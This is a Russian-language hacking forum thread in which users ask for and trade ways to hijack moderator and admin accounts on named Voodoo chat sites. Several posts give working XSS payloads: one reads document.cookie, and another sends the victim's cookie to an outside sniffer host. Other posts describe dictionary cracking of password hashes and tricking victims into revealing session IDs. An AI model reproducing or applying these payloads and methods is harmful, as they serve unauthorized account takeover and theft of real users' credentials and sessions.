в users.dat хранятся никнеймы, и хеши паролей пользователей чата ... но помоему уже никто data директорию в DocumentRoot не сует, в крайнем случае через .htaccess рубают.
Можно поподробнее? ПОМОГИТЕ Как мне сформировать запрос если: адрес чата http://darkside.tomsk.ru/ адрес снифера http://mysite.ru/snif.php Если возможно, попробуйте угнать акк модера nickname: toto password:???
Народ! Я начинающий, ище маздайный античатер! расскажите мне как можно ломонуть вуду чат http://oko.sed.lg.ua:8080/chat/ , плиз! Но, ище, плиз пишете так чтоб было понятно даже юзеру. просто, я ище почти не соображаю в ломе чатов...
http://lom.dp.ua Народ кто может прощупать на уязвимость этот чат , по ходу напоминает вуду, но хотелось бы узнать как можно сделать себя админом, то бишь дать себе права админа ж)))
А чем тебе этот не устроил? _http://lom.dp.ua/view.php?f=10102"><script>alert(document.cookie)</script>
Один вопросик все же возник по поводу этой строчки , в окне , которое появляется высвечивается login: мой , пасс: без понятия чей(возможно админа) , и еще зашифрованый код. Вопрос : Чей это пасс - потому, что когда применяю пишет мол человек либо сидит в чате либо вы ввели неверные данные, опишите как работает эта комманда , зарание спасибо
Его расшифровать нельзя,а вот скачать словарик потом скачать password pro (он слова из словаря шифрует по тому же алгоритму и сравнивает) можно.
Мне подсказали что узнать пароль админа возможно только тогда, когда я достану его кукис, как это возможно, и есть ли какой то другой метод получения пароля админа? Неужели нету уязвимостей, никогда не поверю)
ЧАТ - Voodoo. Спизд***л пасс от логина модератора! Когда захожу прав как у обычного юзера, мне сказали(тут на ачате) что возможно есть специальные команды типа _ban_ _kill_ или чё-та типа того. Изучал исходники, ничего там не нашел! Что это может быть! ЭТо Аккаунт модератора - 100%!
Привет, принимайте новичка) помагите с получением сессий с \\www.love-chat.ru Проблема в том что я обладаю не плохой СИ, но мало понимаю в сниферах=( И ещё, как можно обычному юзеру (без XSS) посматреть свою сессию, а уж сказать её мне я его заставлю. Заранее благадарю, с уважением ИЗ.
Чат действительно Voodoo, чё то он грузитца как будто у меня dial-up стоит Ну попповоду сниферов юзай поиск, тут про xss и сниферы уже можно томов 5 собрать! А сессию открой html страницу sendera (это тот прямоугольничег где ты текст печатаешь что бы отправить) в txt и найди session, выглядеть будет так session=dd165fb008f5aac025a34ec7fa788939 Или там где мой статус, кликни правой кнопкой и зайди в свойства (смотрел чат через IE 6) Но предупреждаю! Я один раз с помощью СИ зоставил жертву выдать мне её сессию, но мне пришло лиж #1234, потом выяснил что в чате стоял фильтр!!! Так что придумаешь что нибудь! Так и есть, если просто вбить сессию то фильтр её отфильтрует!
Здраствуйте. Помогите новичку с составлением запроса для XSS. Нашел стандартную уязвимость в одном Voodoo-чате : http://xxx.xxx/go.php?url=javascript:alert(/test/); Составил следущий код: http://ххх.ххх/go.php?url=javascript:img=new%20Image();img.src="http://s.netsec.ru/cyber_rat.gif?"+document.cookie; Но вместо рисунка появляется "[object]" И еще : alert(/test/); - выводит окошко с надписью /test/ но ни alert(test);, ни alert("test");, ни alert('test'); не выводят ничего.
magic quotes=on а нащет скрипта,думаю там филтр какой то стоит. ну и толку с етой XSS мало.. и так кукизы не передаются, да и с кукизов толку мало.. сессия не в них
